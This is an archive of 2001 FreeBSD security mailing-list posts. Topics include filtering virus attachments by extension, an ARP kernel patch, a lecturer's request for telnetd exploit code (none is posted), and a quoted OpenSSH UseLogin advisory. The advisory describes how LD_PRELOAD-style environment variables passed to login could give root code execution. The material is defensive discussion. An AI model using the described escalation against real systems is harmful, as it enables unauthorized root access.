References: <01d701c17d10$a8b334b0$0001300a@lhtech.lhtek.com> <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz> <4.3.2.7.2.20011204172959.04d112e0@localhost> <5.1.0.14.2.20011204193019.05f01c18@mail.Go2France.com> <20011204194431.E92148@elvis.mu.org> <20011205021654.GA31554@boethius.telocity.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Anthony Kim wrote:

>and .Z
>
>You've got to consider, people send all sorts of weird filenames.
>mtr.c.patch or ncurses.ru.uu or bill_me.c.diff or
>BSD.include.dist - you get the idea.
>
>At work we focus on the AV recommended most wanted, .pif, .exe.,
>.vbs, .scr, .shs, but this list is getting longer and longer :(
>
For an idea, Eudora (eudora.com) has a somewhat comprehensive list of 
attachments that generate warnings when someone tries to open them. 
 They keep this list updated and make it an updatable part of their mail 
client.

This list would give someone a good start as to what to block for 
extensions.

-- 
  Landon Stewart
  System Administrator
  Vancouver Pacific Pender
  Uniserve Online

  Right of Use:
  The sender intends this message for a specific recipient and, as it 
  may contain information that is privileged or confidential, any use, 
  dissemination, forwarding, or copying by anyone without permission 
  from the sender is prohibited. Personal e-mail may contain views 
  that are not necessarily those of the company.


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 19:48:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from elvis.mu.org (elvis.mu.org [216.33.66.196])
	by hub.freebsd.org (Postfix) with ESMTP id E6C1A37B416
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 19:48:15 -0800 (PST)
Received: by elvis.mu.org (Postfix, from userid 1192)
	id 6FB1981D01; Tue,  4 Dec 2001 21:48:10 -0600 (CST)
Date: Tue, 4 Dec 2001 21:48:10 -0600
From: Alfred Perlstein <bright@mu.org>
To: Landon Stewart <landons@uniserve.com>
Cc: Anthony Kim <niceshorts@yahoo.com>, freebsd-security@freebsd.org
Subject: Re: block double suffix attachments? Re: Mail list is posting gone virus!!!!
Message-ID: <20011204214810.G92148@elvis.mu.org>
References: <01d701c17d10$a8b334b0$0001300a@lhtech.lhtek.com> <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz> <4.3.2.7.2.20011204172959.04d112e0@localhost> <5.1.0.14.2.20011204193019.05f01c18@mail.Go2France.com> <20011204194431.E92148@elvis.mu.org> <20011205021654.GA31554@boethius.telocity.com> <3C0D8959.5080500@uniserve.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3C0D8959.5080500@uniserve.com>; from landons@uniserve.com on Tue, Dec 04, 2001 at 06:41:29PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

* Landon Stewart <landons@uniserve.com> [011204 20:41] wrote:
> Anthony Kim wrote:
> 
> >and .Z
> >
> >You've got to consider, people send all sorts of weird filenames.
> >mtr.c.patch or ncurses.ru.uu or bill_me.c.diff or
> >BSD.include.dist - you get the idea.
> >
> >At work we focus on the AV recommended most wanted, .pif, .exe.,
> >.vbs, .scr, .shs, but this list is getting longer and longer :(
> >
> For an idea, Eudora (eudora.com) has a somewhat comprehensive list of 
> attachments that generate warnings when someone tries to open them. 
>  They keep this list updated and make it an updatable part of their mail 
> client.
> 
> This list would give someone a good start as to what to block for 
> extensions.

Since this is a security list I'm going to repeat myself one last
time.

It's a LOT better to have allow(list)->deny(*) than deny(list)->allow(*).
Ever notice how as the viruses keep coming they keep mutating the
extentions?  A deny->allow will not work to stop those before it
is too late.  One should observe similar precautions when doing other
such ACLs, take for instance file permissions, would it make sense
to list a file as:

deny access to this file from web-dev group
allow all others access.

or
allow access to this file from eng and eng-mgmt
deny from all others.

-- 
-Alfred Perlstein [alfred@freebsd.org]
'Instead of asking why a piece of software is using "1970s technology,"
 start asking why software is ignoring 30 years of accumulated wisdom.'
                           http://www.morons.org/rants/gpl-harmful.php3

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 19:51:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from science.slc.edu (Science.SLC.Edu [198.83.6.248])
	by hub.freebsd.org (Postfix) with ESMTP
	id A738637B416; Tue,  4 Dec 2001 19:51:26 -0800 (PST)
Received: (from aschneid@localhost)
	by science.slc.edu (8.11.0/8.11.0) id fB53lkG80700;
	Tue, 4 Dec 2001 22:47:46 -0500 (EST)
	(envelope-from aschneid)
Date: Tue, 4 Dec 2001 22:47:45 -0500
From: Anthony Schneider <aschneid@mail.slc.edu>
To: Anthony Kim <niceshorts@yahoo.com>
Cc: Alfred Perlstein <bright@mu.org>,
	Len Conrad <LConrad@Go2France.com>, freebsd-security@FreeBSD.ORG,
	jmb@FreeBSD.ORG
Subject: Re: block double suffix attachments? Re: Mail list is posting gone virus!!!!
Message-ID: <20011204224745.A80613@mail.slc.edu>
References: <01d701c17d10$a8b334b0$0001300a@lhtech.lhtek.com> <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz> <4.3.2.7.2.20011204172959.04d112e0@localhost> <5.1.0.14.2.20011204193019.05f01c18@mail.Go2France.com> <20011204194431.E92148@elvis.mu.org> <20011205021654.GA31554@boethius.telocity.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="Dxnq1zWXvFF0Q93v"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011205021654.GA31554@boethius.telocity.com>; from niceshorts@yahoo.com on Tue, Dec 04, 2001 at 08:16:54PM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


--Dxnq1zWXvFF0Q93v
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

It couldn't hurt to block out double extensions and simply make
that public.  There's little load wasted on spotting a double
extension, replying to the sender that double extensions are not
allowed, and waiting for the sender to resend without the double
extension.  Same goes with bandwidth.  Plus, how many attachments
with double extensions are actually posted to freebsd-security?
I've seen very few, personally.
-Anthony.

On Tue, Dec 04, 2001 at 08:16:54PM -0600, Anthony Kim wrote:
> On Tue, Dec 04, 2001, Alfred Perlstein wrote:
>=20
> > Blocking double extentions is a real pain because people may
> > elect to send .gz or .bz2 or a myriad of other legit formats.
> > I guess in the face of this obnoxious plague it may make sense
> > to drop all attachments that contain double suffix attachments
> > with the exception of .gz and .bz2.  I know I've most likely
> > forgotten an important extention, but we can add those as the
> > need arises?
>=20
> and .Z
>=20
> You've got to consider, people send all sorts of weird filenames.
> mtr.c.patch or ncurses.ru.uu or bill_me.c.diff or
> BSD.include.dist - you get the idea.
>=20
> At work we focus on the AV recommended most wanted, .pif, .exe.,
> .vbs, .scr, .shs, but this list is getting longer and longer :(
> --=20
> "Le motd juste."
>=20
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

--Dxnq1zWXvFF0Q93v
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iEYEARECAAYFAjwNmOAACgkQ+rDjkNht5F1NWwCfU445RGTPCbtpW9SIFGhe0Cjv
iyAAn1YFcVCP3+1OnTMkSbf0nW9vHv6n
=iHDG
-----END PGP SIGNATURE-----

--Dxnq1zWXvFF0Q93v--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 20:37: 4 2001
Delivered-To: freebsd-security@freebsd.org
Received: from c007.snv.cp.net (c007-h013.c007.snv.cp.net [209.228.33.220])
	by hub.freebsd.org (Postfix) with SMTP id C061037B416
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 20:36:59 -0800 (PST)
Received: (cpmta 23520 invoked from network); 4 Dec 2001 20:36:58 -0800
Received: from 64.195.103.89 (HELO boethius.telocity.com)
  by smtp.telocity.com (209.228.33.220) with SMTP; 4 Dec 2001 20:36:58 -0800
X-Sent: 5 Dec 2001 04:36:58 GMT
Received: by boethius.telocity.com (Postfix, from userid 1000)
	id 4726122CE; Tue,  4 Dec 2001 22:36:58 -0600 (CST)
Date: Tue, 4 Dec 2001 22:36:58 -0600
From: Anthony Kim <niceshorts@yahoo.com>
To: Alfred Perlstein <bright@mu.org>
Cc: Landon Stewart <landons@uniserve.com>,
	freebsd-security@freebsd.org
Subject: Re: block double suffix attachments? Re: Mail list is posting gone virus!!!!
Message-ID: <20011205043658.GA33571@boethius.telocity.com>
Mail-Followup-To: Alfred Perlstein <bright@mu.org>,
	Landon Stewart <landons@uniserve.com>, freebsd-security@freebsd.org
References: <01d701c17d10$a8b334b0$0001300a@lhtech.lhtek.com> <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz> <4.3.2.7.2.20011204172959.04d112e0@localhost> <5.1.0.14.2.20011204193019.05f01c18@mail.Go2France.com> <20011204194431.E92148@elvis.mu.org> <20011205021654.GA31554@boethius.telocity.com> <3C0D8959.5080500@uniserve.com> <20011204214810.G92148@elvis.mu.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20011204214810.G92148@elvis.mu.org>
User-Agent: Mutt/1.3.23.2i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Tue, Dec 04, 2001, Alfred Perlstein wrote:
> * Landon Stewart <landons@uniserve.com> [011204 20:41] wrote:
> > >
> > For an idea, Eudora (eudora.com) has a somewhat comprehensive
> > list of attachments that generate warnings when someone tries
> > to open them.  They keep this list updated and make it an
> > updatable part of their mail client.
> > 
> > This list would give someone a good start as to what to block
> > for extensions.
> 
> Since this is a security list I'm going to repeat myself one
> last time.

Take a deep breath Alfred.

> It's a LOT better to have allow(list)->deny(*) than
> deny(list)->allow(*).  Ever notice how as the viruses keep
> coming they keep mutating the extentions?  A deny->allow will
> not work to stop those before it is too late.  One should
> observe similar precautions when doing other such ACLs, take
> for instance file permissions, would it make sense to list a
> file as:
> 
> deny access to this file from web-dev group allow all others
> access.
> 
> or allow access to this file from eng and eng-mgmt deny from
> all others.

Alfred is correct of course. In most contexts, this is a sound
policy. I believe Landon and I crossed contexts however in
implying that in business, the dropping of all attachments is
typically found to be unacceptable, therefore one hopes to
perform due diligence with the next best thing. For my company
and companies like mine, deny(list)->allow(*) for mail is an
acceptable risk. Surely, I should have made the contextual
distinction clearer.

So let's end this off topic discussion.
-- 
"Le motd juste."

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 21:44:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from www.svzserv.kemerovo.su (www.svzserv.kemerovo.su [213.184.65.80])
	by hub.freebsd.org (Postfix) with ESMTP
	id D340C37B419; Tue,  4 Dec 2001 21:44:27 -0800 (PST)
Received: (from eugen@localhost)
	by www.svzserv.kemerovo.su (8.11.6/8.11.6) id fB55iUE84014;
	Wed, 5 Dec 2001 12:44:30 +0700 (KRAT)
	(envelope-from eugen)
Date: Wed, 5 Dec 2001 12:44:30 +0700
From: Eugene Grosbein <eugen@www.svzserv.kemerovo.su>
To: security@freebsd.org
Cc: net@freebsd.org
Subject: NOARP - gateway must answer and have frozen ARP table
Message-ID: <20011205124430.A83642@svzserv.kemerovo.su>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hi!
Not sure what is correct list, this is about network security.

Flag NOARP did not work for ethernet interface before 4.4-RELEASE.
We needed static ARP table so used local patch for it.
4.4-RELEASE implemented NOARP but in the different way.

Now a router even does not respond to clients asking for its link address,
that is not very wise. We cannot force all our clients to use static
ARP entries for our router (their gateway). So we patched 4.4 sources again.
The needed behavour is static ARP table filled at boot time with arp(8)
and there must be answers for router's own ethernet address. 
Can there be an option to enable this behavour in FreeBSD distribution?

Here is a patch for 4.4. Please review.

--- netinet/if_ether.c.orig	Mon Aug  6 15:26:06 2001
+++ netinet/if_ether.c	Sun Nov 11 21:01:07 2001
@@ -408,8 +408,10 @@
 	 * Probably should not allocate empty llinfo struct if we are
 	 * not going to be sending out an arp request.
 	 */
+/*VK
 	if (ac->ac_if.if_flags & IFF_NOARP)
 		return (0);
+VK*/
 	/*
 	 * There is an arptab entry, but no ethernet address
 	 * response yet.  Replace the held mbuf with this
@@ -580,6 +582,7 @@
 		itaddr = myaddr;
 		goto reply;
 	}
+/*VV*/	if (!(ac->ac_if.if_flags & IFF_NOARP)) {
 	la = arplookup(isaddr.s_addr, itaddr.s_addr == myaddr.s_addr, 0);
 	if (la && (rt = la->la_rt) && (sdl = SDL(rt->rt_gateway))) {
 		/* the following is not an error when doing bridging */
@@ -651,6 +654,7 @@
 			la->la_hold = 0;
 		}
 	}
+/*VV*/	}
 reply:
 	if (op != ARPOP_REQUEST) {
 		m_freem(m);
--- net/if_ethersubr.c.orig	Wed Nov  7 22:34:36 2001
+++ net/if_ethersubr.c	Sun Nov 11 21:10:20 2001
@@ -554,11 +554,12 @@
 		break;
 
 	case ETHERTYPE_ARP:
-		if (ifp->if_flags & IFF_NOARP) {
+/*VK		if (ifp->if_flags & IFF_NOARP) { VK*/
 			/* Discard packet if ARP is disabled on interface */
-			m_freem(m);
+/*VK			m_freem(m);
 			return;
 		}
+VK*/
 		schednetisr(NETISR_ARP);
 		inq = &arpintrq;
 		break;

Eugene Grosbein

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 21:46:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from minnie.tuhs.org (minnie.tuhs.org [131.245.7.145])
	by hub.freebsd.org (Postfix) with ESMTP id 7E3E837B405
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 21:46:45 -0800 (PST)
Received: (from wkt@localhost)
	by minnie.tuhs.org (8.11.3/8.11.3) id fB55kTf46559
	for freebsd-security@freebsd.org; Wed, 5 Dec 2001 16:46:29 +1100 (EST)
	(envelope-from wkt)
From: Warren Toomey <wkt@minnie.tuhs.org>
Message-Id: <200112050546.fB55kTf46559@minnie.tuhs.org>
Subject: Strange request, telnetd exploit
To: freebsd-security@freebsd.org
Date: Wed, 5 Dec 2001 16:46:29 +1100 (EST)
Reply-To: wkt@tuhs.org
X-Mailer: ELM [version 2.4ME+ PL68 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hi all,
	This is a strange request. I'm giving a network programming course
at a Uni here in Australia. Last week, I looked at common vulnerabilites,
e.g buffer overflows, and I also described probe tools etc etc.

On Friday, I was going to demonstrate tools like nmap, nessus and saint,
and end with a demo of a real-live exploit. I thought of the recent telnetd
exploit, and I still have the old FreeBSD 4.3 binary on CD.

I'd like to set up the old, vulnerable telnet with appropriate
/etc/hosts.allow rules to only allow an attack from within the local subnet.

However, I cannot find a copy of the exploit code. Can anybody help me?

To give you some details of my bona fides:

The course I'm running: http://www.it.bond.edu.au/inft334/013/
The security lecture: http://www.it.bond.edu.au/inft334/013/lectures/week12.html
I was assistant program chair on a security symposium which was held
about 2 weeks ago: http://www.auug.org.au/security2001/
Other security stuff I have worked on in the past:
http://minnie.tuhs.org/Seminars/index.html (you have to read the titles)

Many thanks in advance,
	Warren Toomey, School of IT, Bond Uni

P.S My PGP keys are at http://minnie.tuhs.org/warren.html if you'd rather
send me PGP-encrypted code.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 21:52: 6 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.axelero.hu (cmail.axelero.hu [195.228.240.83])
	by hub.freebsd.org (Postfix) with SMTP id CC12F37B419
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 21:51:58 -0800 (PST)
Received: (qmail 24454 invoked from network); 5 Dec 2001 06:51:57 +0100
Received: from adsl101.228.axelero.hu (HELO Picasso.Zahemszky.HU) (root@195.228.228.101)
  by mail.axelero.hu with SMTP; 5 Dec 2001 06:51:57 +0100
Received: (from zgabor@localhost)
	by Picasso.Zahemszky.HU (8.11.6/8.11.6) id fB55rvC00542
	for freebsd-security@freebsd.org; Wed, 5 Dec 2001 06:53:57 +0100 (CET)
	(envelope-from zgabor)
Date: Wed, 5 Dec 2001 06:53:57 +0100
From: =?iso-8859-1?Q?Zahemszky_G=E1bor?= <Gabor@Zahemszky.HU>
To: freebsd-security@freebsd.org
Subject: Re: Hi (off-topic)
Message-ID: <20011205065357.A487@Picasso.Zahemszky.HU>
References: <JDEAIDLKPMMILNJHADGCKEAPEGAA.carock@epctech.com> <3C0D4FBD.17F0BA07@fpsn.net> <015001c17d15$0c97e170$0a00000a@atkielski.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <015001c17d15$0c97e170$0a00000a@atkielski.com>; from anthony@freebie.atkielski.com on Tue, Dec 04, 2001 at 11:43:08PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Tue, Dec 04, 2001 at 11:43:08PM +0100, Anthony Atkielski wrote:
> A simple solution:  Don't open files with suspicious attachments.  That's what I do.

<VERY_OFF>

Hi!

A simple solution: use UNIX based e-mail clients.  I like mutt, but I'm a
console-fan.  Sometimes I use sylpheed, it's a nice W*-like graphical
client running under X, and it's in the ports collection.

Bye:

ZGabor < Gabor at Zahemszky dot HU >

</VERY_OFF>

-- 
#!/bin/ksh
Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X"

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 22:59:54 2001
Delivered-To: freebsd-security@freebsd.org
Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201])
	by hub.freebsd.org (Postfix) with ESMTP
	id C18FA37B417; Tue,  4 Dec 2001 22:59:51 -0800 (PST)
Received: from sheldonh (helo=axl.seasidesoftware.co.za)
	by axl.seasidesoftware.co.za with local-esmtp (Exim 3.33 #1)
	id 16BW3F-000BJj-00; Wed, 05 Dec 2001 09:01:05 +0200
From: Sheldon Hearn <sheldonh@starjuice.net>
To: daver@flag.blackened.net (Pomegranate)
Cc: cjc@FreeBSD.ORG, peter.jeremy@alcatel.com.au,
	freebsd-security@FreeBSD.ORG
Subject: Re: OPIE mailing list 
In-reply-to: Your message of "Tue, 04 Dec 2001 10:24:09 PST."
             <20011204182409.0B78A6831@flag.blackened.net> 
Date: Wed, 05 Dec 2001 09:01:04 +0200
Message-ID: <43506.1007535664@axl.seasidesoftware.co.za>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


On Tue, 04 Dec 2001 10:24:09 PST, Pomegranate wrote:

> also, last i checked, freebsd's OPIE is at least one minor revision
> behind the NRL releases but nobody seems to care much whenever i've
> mentioned it.

One way to encourage people to care is to present the issues addressed
by the upgrade.  I'm sure Mark Murray <markm@FreeBSD.org> would be
interested if the upgrade addressed issues pertinent to FreeBSD.

Ciao,
Sheldon.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 23: 3:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from terminus.dnttm.ro (terminus.dnttm.ro [193.226.98.11])
	by hub.freebsd.org (Postfix) with ESMTP id 2D81337B405
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 23:03:24 -0800 (PST)
Received: from unix.edc.dnttm.ro (edc.dnttm.ro [193.226.98.104])
	by terminus.dnttm.ro (8.9.3/8.9.3) with ESMTP id JAA28674
	for <freebsd-security@freebsd.org>; Wed, 5 Dec 2001 09:03:21 +0200
Received: (from root@localhost)
	by unix.edc.dnttm.ro (8.11.6/8.11.2) id fB573Kv07702
	for freebsd-security@freebsd.org; Wed, 5 Dec 2001 09:03:20 +0200 (EET)
	(envelope-from titus)
Received: (from titus@localhost)
	by unix.edc.dnttm.ro (8.11.6/8.11.2av) id fB573Iq07688
	for freebsd-security@FreeBSD.ORG; Wed, 5 Dec 2001 09:03:18 +0200 (EET)
	(envelope-from titus)
Date: Wed, 5 Dec 2001 09:03:18 +0200
From: titus manea <titus@edc.dnttm.ro>
To: freebsd-security@FreeBSD.ORG
Subject: OpenSSH UseLogin problem
Message-ID: <20011205090318.A7617@unix.edc.dnttm.ro>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Mutt/1.2.5i
X-Virus-Scanned: by AMaViS perl-10
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

---------------------------------------------------------------
II.  Problem Description

OpenSSH includes a feature by which a user can arrange for
environmental variables to be set depending upon the key used for
authentication.  These environmental variables are specified in the
=01uthorized_keys' (SSHv1) or `authorized_keys2' (SSHv2) files in the
user's home directory on the server.  This is normally safe, as this
environment is passed only to the user's shell, which is invoked with
user privileges.

However, when the OpenSSH server `sshd' is configured to use
the system's login program (via the directive `UseLogin yes' in
sshd_config), this environment is passed to login, which is invoked
with superuser privileges.  Because certain environmental variables
such as LD_LIBRARY_PATH and LD_PRELOAD can be set using the previously
described feature, the user may arrange for login to execute arbitrary
code with superuser privileges.


-------------------------------------------------------------------------

ls -l `which login`

-r-sr-xr-x  1 root  wheel  22020 Oct 25 13:06 /usr/bin/login

LD_ env vars like LD_LIBRARY_PATH and such do not work for setuid binaries.
(ld.so man page)
programs. Here is an example ( i did it as root).=20


Ok, i moved libmysqlclient.so.10 from its place to my ~. and copied=20
mysql to ~ too.

[08:52:11] [titus!root]~#./mysql
/usr/libexec/ld-elf.so.1: Shared object "libmysqlclient.so.10" not found
[08:52:19] [titus!root]~#export LD_LIBRARY_PATH=3D/home/titus
[08:52:35] [titus!root]~#./mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 5 to server version: 3.23.41

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> Bye
[08:52:49] [titus!root]~#chmod +s mysql
[08:52:54] [titus!root]~#./mysql
/usr/libexec/ld-elf.so.1: Shared object "libmysqlclient.so.10" not found
[08:52:55] [titus!root]~#


--=20

__________________________________________________________________________
 Titus Manea  <titus@2edc.com>       |  Eastern Digital Inc.
         Lab owner                   |   http://2edc.com
                                     |    +40-56-192091          =20
       =20

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 23:10:10 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2])
	by hub.freebsd.org (Postfix) with ESMTP id 7A6F137B417
	for <freebsd-security@FreeBSD.ORG>; Tue,  4 Dec 2001 23:10:07 -0800 (PST)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2])
	by lariat.org (8.9.3/8.9.3) with ESMTP id AAA00680;
	Wed, 5 Dec 2001 00:08:21 -0700 (MST)
Message-Id: <4.3.2.7.2.20011205000635.048414a0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Wed, 05 Dec 2001 00:07:50 -0700
To: Len Conrad <LConrad@Go2France.com>, freebsd-security@FreeBSD.ORG
From: Brett Glass <brett@lariat.org>
Subject: Re: Mail list is posting gone virus!!!!
In-Reply-To: <5.1.0.14.2.20011204193019.05f01c18@mail.Go2France.com>
References: <4.3.2.7.2.20011204172959.04d112e0@localhost>
 <01d701c17d10$a8b334b0$0001300a@lhtech.lhtek.com>
 <C1EC3AA970F8D311BA4D0050BAB07BA870491B@nhex1101.cologic.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

At 06:34 PM 12/4/2001, Len Conrad wrote:

>the freebsd hubs run postfix, afaik, which can block on single and double file extensions, like .scr, .doc.scr.

This helps, but it's far from the only heuristic to use.

Of course, since we're talking about mailing lists here, FreeBSD
should probably just strip all attachments and defang or block
active content.

--Brett


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 23:19:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from main.phantom.gr.jp (main.phantom.gr.jp [61.206.12.34])
	by hub.freebsd.org (Postfix) with ESMTP id 5133D37B419
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 23:19:09 -0800 (PST)
